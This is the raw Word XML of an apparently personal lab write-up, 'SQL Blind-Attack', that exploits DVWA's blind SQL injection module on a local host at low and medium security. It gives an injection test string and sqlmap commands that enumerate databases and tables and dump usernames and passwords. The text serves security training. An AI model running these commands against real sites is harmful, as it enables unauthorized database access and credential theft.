          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Block known SQLi payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346B7E22" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E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77AA0" w14:textId="62F48EBA" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B"/>
    <w:p w14:paraId="5B144DFC" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4929C843" w14:textId="284CCD13" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc198745929"/>
      <w:r>
        <w:t>SQL Blind</w:t>
      </w:r>
      <w:r w:rsidR="009036BC">
        <w:t>-Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="54548D3A" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc198745930"/>
      <w:r>
        <w:t>Intro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="3EA18AB7" w14:textId="77777777" w:rsidR="00A92E26" w:rsidRPr="00A92E26" w:rsidRDefault="00A92E26" w:rsidP="00A92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92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ile testing the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A92E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QL Injection (Blind)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A92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dule in DVWA, I encountered a vulnerability where the application did not display output from the database directly. However, by carefully analyzing the application's </w:t>
      </w:r>
      <w:r w:rsidRPr="00A92E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ponse behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00A92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I was able to infer true/false results from injected queries — indicating a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A92E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lind SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00A92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ulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F85B4B" w14:textId="77777777" w:rsidR="00A92E26" w:rsidRPr="00A92E26" w:rsidRDefault="00A92E26" w:rsidP="00A92E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AD2AC" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc198745931"/>
      <w:r>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="295A7640" w14:textId="0858F6E7" w:rsidR="00A92E26" w:rsidRDefault="00A92E26" w:rsidP="00A92E26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00A92E26">
        <w:t>Check_Database_Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0DC7B2" w14:textId="293AD2B3" w:rsidR="00A92E26" w:rsidRDefault="00A92E26" w:rsidP="00A92E26">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r w:rsidRPr="00A92E26">
        <w:t>Check Error= 1' or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE5525E" w14:textId="344AB4CF" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A92E26">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4188501F" wp14:editId="65436748">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="75650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4A44" w14:textId="5BBD4374" w:rsidR="00A92E26" w:rsidRDefault="00A92E26" w:rsidP="00A92E26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00A92E26">
        <w:t>Capture_Req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572DB1F5" w14:textId="5B891C74" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38D0880E" wp14:editId="766A40C3">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1399031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54A5" w14:textId="2FBA53AC" w:rsidR="00A92E26" w:rsidRDefault="00A92E26" w:rsidP="00A92E26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00A92E26">
        <w:t>Show_Available_Dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585FC666" w14:textId="77777777" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:r>
        <w:t xml:space="preserve">Available Database= </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4B1683" w14:textId="77777777" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7" --dbs --batch --risk=3 --level=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7965E489" w14:textId="4C65801B" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BB1F64D" wp14:editId="4A92A254">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="365719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B8F1" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00A33E48">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="164BC409" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00A33E48">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371D7866" w14:textId="77777777" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:ind w:left="66"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294E2E82" w14:textId="66017C40" w:rsidR="00A92E26" w:rsidRDefault="00A92E26" w:rsidP="00A33E48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A92E26">
        <w:t>Dbs_Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CFA781" w14:textId="03B0C311" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:ind w:left="66"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44A01A5C" wp14:editId="76B2F5F5">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11344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8FA3D" w14:textId="77777777" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:ind w:left="66"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D3D4FCC" w14:textId="55ED9982" w:rsidR="00A92E26" w:rsidRDefault="00A92E26" w:rsidP="00A92E26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00A92E26">
        <w:t>Show_dvwa_Dbs_Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481E2934" w14:textId="77777777" w:rsidR="00A33E48" w:rsidRPr="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r w:rsidRPr="00A33E48">
        <w:t>Show database tables=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481F9DCF" w14:textId="77777777" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:ind w:left="66"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A33E48">
        <w:t>sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7" -D dvwa --tables --batch --risk=3 --level=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9D7123" w14:textId="743D73C5" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03E19E49" wp14:editId="3D8371D6">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12620832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B227" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00A33E48"/>
    <w:p w14:paraId="4EB43465" w14:textId="3BD8ED30" w:rsidR="00A92E26" w:rsidRDefault="00A92E26" w:rsidP="00A92E26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00A92E26">
        <w:t>dvwa_tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44264449" w14:textId="33DF0B36" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7274F00F" wp14:editId="4AF53F1F">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="541498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40DF" w14:textId="1ECE03AC" w:rsidR="00A92E26" w:rsidRDefault="00A92E26" w:rsidP="00A92E26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00A92E26">
        <w:t>dvwa_Users_Table_Columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE5163F" w14:textId="77777777" w:rsidR="00A33E48" w:rsidRPr="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:r w:rsidRPr="00A33E48">
        <w:t>show table users columns=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB792E7" w14:textId="2B584881" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A33E48">
        <w:t>sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7" -D dvwa -T users --columns --batch --risk=3 --level=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270E8CA1" w14:textId="2D760E50" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B7D4109" wp14:editId="26634FB3">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2127740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77AA" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00A33E48">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF6F0AD" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00A33E48">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="358BA2D9" w14:textId="25262F10" w:rsidR="00A92E26" w:rsidRDefault="00A92E26" w:rsidP="00A92E26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00A92E26">
        <w:t>User_Table_Columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413AC2BA" w14:textId="71583973" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D04D5AA" wp14:editId="5A1D055B">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17196550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ECF2" w14:textId="71310C07" w:rsidR="00A92E26" w:rsidRDefault="00A92E26" w:rsidP="00A92E26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00A92E26">
        <w:t>Fetch_User&amp;Passwd_Columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D36AEF" w14:textId="77777777" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:ind w:left="66"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Show username and passwords=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0872DAB6" w14:textId="0ABA3223" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:ind w:left="66"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7" -D dvwa -T users -C user,password --dump --batch --risk=3 --level=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5613AFAC" w14:textId="4FFBBCAF" w:rsidR="00A33E48" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:ind w:left="66"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CAB4F72" wp14:editId="1FD8C57D">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2144058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219A" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00A33E48">
      <w:pPr>
        <w:ind w:left="66"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1363EC7D" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00A33E48">
      <w:pPr>
        <w:ind w:left="66"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1733D5" w14:textId="04405D97" w:rsidR="00A92E26" w:rsidRDefault="00A92E26" w:rsidP="00A92E26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00A92E26">
        <w:t>Username&amp;Passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56480A6B" w14:textId="4586C7B0" w:rsidR="00A33E48" w:rsidRPr="00A92E26" w:rsidRDefault="00A33E48" w:rsidP="00A33E48">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32FD52B4" wp14:editId="3C6C3FCF">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2884864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0D7" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc198745932"/>
      <w:r>
        <w:t>Med</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="29EB93EC" w14:textId="5C52791F" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="142" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F97D8B">
        <w:t>Capture_Req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AA4342" w14:textId="4E45F81C" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A2D703D" wp14:editId="77682E61">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15626498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D0D4" w14:textId="2B1A40AB" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="142" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F97D8B">
        <w:t>Show_Available_Dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D7F7A6" w14:textId="51CF5352" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F97D8B">
        <w:t>sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/" --cookie="security_level=0; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7; security=medium" --data="id=1&amp;Submit=Submit"  --dbs --batch --risk=3 --level=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B05CBF0" w14:textId="6EB2581B" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06248FF7" wp14:editId="345D3933">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3511486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4883" w14:textId="742E19F1" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="142" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F97D8B">
        <w:t>Dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC62005" w14:textId="71736DCB" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76596F37" wp14:editId="00EA376E">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5333393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622C" w14:textId="5500B9B4" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="142" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F97D8B">
        <w:t>Show_DVWA_Dbs_Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFCBA01" w14:textId="71D51D73" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F97D8B">
        <w:t>sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/" --cookie="security_level=0; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7; security=medium" --data="id=1&amp;Submit=Submit"  -D dvwa --tables --batch --risk=3 --level=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C0131" w14:textId="3D90A1C3" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B8A3482" wp14:editId="019D0C36">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="646576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16CC" w14:textId="230E3A6D" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="142" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F97D8B">
        <w:t>Show_Tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760E8654" w14:textId="5C225790" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55CDDDB8" wp14:editId="4CAC1B38">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2169846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5FC5" w14:textId="033CD329" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="142" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F97D8B">
        <w:t>Show_User_Table_Columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87A2D8" w14:textId="320506F9" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F97D8B">
        <w:t>sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/" --cookie="security_level=0; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7; security=medium" --data="id=1&amp;Submit=Submit"  -D dvwa -T users --columns --batch --risk=3 --level=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6063B604" w14:textId="31055CC6" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D110FB4" wp14:editId="11D5A874">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10603699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BE2D" w14:textId="79D5D92C" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="142" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F97D8B">
        <w:t>User_Table_Columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4403C63B" w14:textId="38964D83" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="200F6CC8" wp14:editId="4743DF2D">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5715109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28FC" w14:textId="39CD73C4" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="142" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F97D8B">
        <w:t>Fetch_User,Passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6FCAF1" w14:textId="4D356B83" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F97D8B">
        <w:t>sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/" --cookie="security_level=0; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7; security=medium" --data="id=1&amp;Submit=Submit"  -D dvwa -T users -C user,password --dump --batch --risk=3 --level=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB4844A" w14:textId="7AEF4042" w:rsidR="00F97D8B" w:rsidRDefault="00C119EB" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
        <w:jc w:val="both"/>
